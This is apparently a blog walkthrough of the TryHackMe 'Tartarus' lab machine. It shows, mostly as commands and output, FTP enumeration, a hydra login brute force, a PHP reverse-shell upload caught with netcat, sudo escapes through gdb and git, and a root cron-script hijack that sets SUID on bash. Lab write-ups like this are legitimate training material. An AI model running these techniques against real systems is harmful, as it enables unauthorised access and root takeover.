Tartarus- Tryhackme

Ashutosh Gupta
9 min readSep 23, 2020

--

Hey folks I am Ashutosh Gupta(a.k.a m3ta_c1phr). Recently I started series of Tryhackme rooms walkthrough. So you can see other walkthrough also in my medium profile. This is the easy level room for beginners with some basic enumeration of ftp and more.

Enumeration:

So lets start with basic nmap scan .

nmap -sC -sV 10.10.148.67

  • sC is used for script enumeration i.e which scripts are used
  • sV is used for service enumeration which services are running
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-23 14:40 IST
Nmap scan report for 10.10.148.67
Host is up (0.18s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 ftp ftp 17 Jul 05 21:45 test.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.82.50
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 98:6c:7f:49:db:54:cb:36:6d:d5:ff:75:42:4c:a7:e0 (RSA)
| 256 0c:7b:1a:9c:ed:4b:29:f5:3e:be:1c:9a:e4:4c:07:2c (ECDSA)
|_ 256 50:09:9f:c0:67:3e:89:93:b0:c9:85:f1:93:89:50:68 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

So we are having 3 ports open i.e 21,22,80. And in ftp anonymous login is allowed so it might be helpful for us we will check this later.

And if you will see port 80 on browser it will give you default apache page.

Before going to FTP lets do directory. I used gobuster tool for this.

└─$ gobuster dir -u http://10.10.148.67/  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,css 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.148.67/
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,html,txt,css
[+] Timeout: 10s
===============================================================
2020/09/23 15:28:46 Starting gobuster
===============================================================
/index.html (Status: 200)
/robots.txt (Status: 200)

Here we got two files. Lets see robots.txt.

In this we got another directory and one username. Lets see what is there in this directory.

Here we got two file lets download it might be helpful.

FTP Enumeration:

─$ ftp 10.10.148.67                                                                                                                                              2 ⚙
Connected to 10.10.148.67.
220 (vsFTPd 3.0.3)
Name (10.10.148.67:metaciphar): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

lets try to see the files and directories.

ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 .
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 ..
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 ...
-rw-r--r-- 1 ftp ftp 17 Jul 05 21:45 test.txt
226 Directory send OK.
ftp>

we are having one text file name test.txt and 3 directories. lets see what is there in test.txt. We can’t open file here because ftp is only used for file transfer we will use get command to get this in our pc.

ftp> get test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for test.txt (17 bytes).
226 Transfer complete.
17 bytes received in 0.00 secs (123.8923 kB/s)
ftp>

Have you noticed that ? I think you have because I missed that. See again files and folders are there in ftp. You will see that there is a folder named ‘…’ this is not the hardlink. So lets see what is there in ‘…’

ftp> cd ...
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 .
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 ..
drwxr-xr-x 2 ftp ftp 4096 Jul 05 21:31 ...
226 Directory send OK.
ftp> cd ...
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jul 05 21:31 .
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 ..
-rw-r--r-- 1 ftp ftp 14 Jul 05 21:45 yougotgoodeyes.txt
226 Directory send OK.
ftp>

So after going to directory ‘…’ we found another directory ‘…’ in this we found another file name as ‘yougotgoodeyes.txt’. Lets transfer this file to our pc. What’s the command? .

“get yougotgoodeyes.txt”

└─$ cat yougotgoodeyes.txt                                                  
/sUp3r-s3cr3t

It seems like a directory. Lets open in browser.

Its a login page. So did we have any credential? No. But we have wordlist for user and password remember we got above. So lets bruteforce.

I used hydra for bruteforcing you can use burpsuite also. And burpsuite is quite easy.

hydra -L userid -P credentials.txt 10.10.148.67 http-post-form /sUp3r-s3cr3t/authenticate.php:username=^USER^&password=^PASS^:Incorrect username!

you can take refernce of this website to use hydra —

So we got 16 valid password but if you will notice username is enox for all. And if you try all are invalid only one passoword is valid which is P@ssword1234

user - enox
pass - P@ssword1234

Lets login. We got this after login.

So lets upload the reverse shell of php.

And change the ip and port in script.

After uploading there is one question how to execute the file.

As /sUp3r-s3cr3t/ is directory we can try gobuster on this.

gobuster dir -u http://10.10.148.67/sUp3r-s3cr3t/  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,css 2>/dev/null      5 ⚙
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.148.67/sUp3r-s3cr3t/
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,html,txt,css
[+] Timeout: 10s
===============================================================
2020/09/23 16:24:13 Starting gobuster
===============================================================
/home.php (Status: 302)
/images (Status: 301)
/index.html (Status: 200)
/style.css (Status: 200)

So lets open images.

There you see uploads. Lets open that there you will reverse-shell. Before clicking on file we have create a listner.

└─$ nc -nlvp 1235                                                                                                                                           148 ⨯ 6 ⚙
listening on [any] 1235 ...
connect to [10.8.82.50] from (UNKNOWN) [10.10.148.67] 49312
Linux ubuntu-xenial 4.4.0-184-generic #214-Ubuntu SMP Thu Jun 4 10:14:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
10:57:04 up 2:02, 0 users, load average: 0.02, 0.04, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

I used netcat (nc).

USER Enumeration:

Lets go to home directory and search for user flag.

User flag :- 0f7dbb2243exxxxxxxxxxxxxxx

Privilege Escalation:

As now we are www-data. Lets see what commands we can run as sudo.

sudo -l
Matching Defaults entries for www-data on ubuntu-xenial:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu-xenial:
(thirtytwo) NOPASSWD: /var/www/gdb

So we can run gdb as sudo. Lets see the exploit.

Mostly sudo and suid exploit are on gtfobins.

So this is the exploit for gdb.

sudo -u thirtytwo /var/www/gdb -nx -ex '!sh' -ex quit

Lets take python tty shell for convinence

python -c 'import pty; pty.spawn("/bin/sh")'

Now see root commands for thirtytwo

$ sudo -l
sudo -l
Matching Defaults entries for thirtytwo on ubuntu-xenial:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User thirtytwo may run the following commands on ubuntu-xenial:
(d4rckh) NOPASSWD: /usr/bin/git

So we can exploit git using d4rckh user.

Same website for finding exploit(gtfobins) in sudo section.

I found git exploit for sudo

sudo -u d4rckh git -p help config
!/bin/bash

As we have to modify exploit as it working for d4ckh user.

$ sudo -u d4rckh git -p help config
sudo -u d4rckh git -p help config
WARNING: terminal is not fully functional
- (press RETURN)
GIT-CONFIG(1) Git Manual GIT-CONFIG(1)
NAME
git-config - Get and set repository or global options
SYNOPSIS
git config [<file-option>] [type] [-z|--null] name [value [value_regex]]
git config [<file-option>] [type] --add name value
git config [<file-option>] [type] --replace-all name value [value_regex]
git config [<file-option>] [type] [-z|--null] --get name [value_regex]
git config [<file-option>] [type] [-z|--null] --get-all name [value_regex
]
git config [<file-option>] [type] [-z|--null] [--name-only] --get-regexp
name_regex [value_regex]
git config [<file-option>] [type] [-z|--null] --get-urlmatch name URL
git config [<file-option>] --unset name [value_regex]
git config [<file-option>] --unset-all name [value_regex]
git config [<file-option>] --rename-section old_name new_name
git config [<file-option>] --remove-section name
git config [<file-option>] [-z|--null] [--name-only] -l | --list
git config [<file-option>] --get-color name [default]
git config [<file-option>] --get-colorbool name [stdout-is-tty]
git config [<file-option>] -e | --edit
:!/bin/bash
!/bin/bash
d4rckh@ubuntu-xenial:/home/d4rckh$

Now if you try to do sudo -l then it will password but we don’t have password for that.

If you see we have cleanup.py in home of d4rckh. Lets open that.

cat cleanup.py
# -*- coding: utf-8 -*-
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /home/cleanup/* ')
except:
sys.exit()

It seems that it deletes all the data in /home/cleanup at some interval. So we can check crontab.

cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/2 * * * * root python /home/d4rckh/cleanup.py
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

As you can see crontab is running for cleanup.py.

Here we can do onething for root is that python hijacking. It means we will modify cleanup.py and add some malcious code in that.

echo "os.system('chmod +s /bin/bash')" >>cleanup.py

So this is the simple command which exuctes a shell but as root and +s for suid.

d4rckh@ubuntu-xenial:/home/d4rckh$ cd /bin
cd /bin
d4rckh@ubuntu-xenial:/bin$ /bin/bash -p
/bin/bash -p
bash-4.3#

Then goto /bin and then run that file name bash. And execute that file with root priveleges.

bash-4.3# cd /root
cd /root
bash-4.3# cat root.txt
cat root.txt
7e055812184axxxxxxxxxxxxx
bash-4.3#

root flag :- 7e055812184axxxxxxxxxxxxx

So I think you liked this writeup.

This is my linkedin profile :- www.linkedin.com/in/ashutoshg547

Feel free to DM me anytime for help.

Thank you all for reading this.

--

--

No responses yet